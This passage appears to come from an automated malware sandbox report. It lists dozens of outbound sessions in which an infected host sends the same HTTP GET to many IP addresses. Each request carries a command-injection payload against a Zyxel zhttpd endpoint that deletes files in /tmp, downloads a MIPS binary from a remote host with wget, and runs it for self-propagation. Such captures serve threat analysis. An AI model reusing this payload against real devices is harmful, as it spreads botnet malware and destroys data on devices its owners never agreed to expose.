                                        Mar 31, 2024 09:21:18.884669065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4539192.168.2.234637477.75.148.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884726048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4540192.168.2.233524218.234.224.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884782076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4541192.168.2.2359778144.180.192.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884845972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4542192.168.2.233315299.133.147.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884902000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4543192.168.2.234112644.141.134.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884944916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4544192.168.2.235231847.50.3.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884991884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4545192.168.2.2357064199.239.255.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885082006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4546192.168.2.23412361.218.66.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885118008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4547192.168.2.2346412144.33.245.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885169029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4548192.168.2.235489452.73.209.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885226011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4549192.168.2.23534922.229.124.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885309935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4550192.168.2.2333612118.12.63.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885345936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4551192.168.2.2346622217.136.189.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885384083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4552192.168.2.2348156165.226.11.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885447025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4553192.168.2.233551057.34.148.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885505915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4554192.168.2.2354102202.14.216.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885603905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4555192.168.2.2335786150.217.167.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885628939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4556192.168.2.233520631.50.69.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885693073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4557192.168.2.2335276188.102.93.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885730028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4558192.168.2.2353164166.5.250.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885782957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4559192.168.2.233907072.123.24.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885818958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4560192.168.2.2345480182.75.69.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885879993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4561192.168.2.2336712178.241.204.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885921955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4562192.168.2.233989452.103.11.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.885967970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4563192.168.2.234339634.36.248.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886064053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4564192.168.2.235517642.174.181.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886087894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4565192.168.2.2357264133.193.178.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886157036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4566192.168.2.2338692152.90.222.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886204958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4567192.168.2.234756027.16.205.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886255026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4568192.168.2.2356910139.84.58.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886343956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4569192.168.2.2358890131.22.102.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886387110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4570192.168.2.233846449.209.52.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886472940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4571192.168.2.2336186207.197.19.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886521101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4572192.168.2.2335898177.137.60.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886569023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4573192.168.2.2349874133.10.228.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886632919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4574192.168.2.2360424142.129.124.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886693954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4575192.168.2.2356452126.39.107.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886750937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4576192.168.2.2349910203.159.244.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886823893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4577192.168.2.235836479.129.69.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886885881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4578192.168.2.2346950209.143.113.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886944056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4579192.168.2.2346574193.57.54.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.886997938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4580192.168.2.2351310207.128.35.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887052059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4581192.168.2.233966296.236.5.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887104988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4582192.168.2.236088447.211.135.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887151957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4583192.168.2.2339948113.179.42.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887223005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4584192.168.2.234536874.228.86.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887281895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4585192.168.2.235422652.100.75.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887370110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4586192.168.2.2359768132.200.57.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887418985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4587192.168.2.2344890141.235.59.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887506962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4588192.168.2.2338654169.198.154.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887536049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4589192.168.2.233368813.44.102.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887587070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4590192.168.2.235552014.252.222.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887676954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4591192.168.2.2341066148.25.97.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887733936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4592192.168.2.233373688.80.61.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887834072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4593192.168.2.2340644152.109.100.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887885094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4594192.168.2.233485860.239.237.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887959003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4595192.168.2.2352562202.113.172.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.887994051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4596192.168.2.234335877.41.107.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888047934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4597192.168.2.236028813.15.171.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888088942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4598192.168.2.2356810105.109.176.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888153076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4599192.168.2.2335544133.92.157.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888200045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4600192.168.2.2339746156.62.61.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888262987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4601192.168.2.2339148113.126.175.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888310909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4602192.168.2.235426485.1.28.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888422012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4603192.168.2.2350948220.18.117.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888459921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4604192.168.2.2356448106.185.119.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888530016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4605192.168.2.2338588126.215.133.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888566971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4606192.168.2.235489065.25.154.199443
                                        TimestampBytes transferredDirectionData
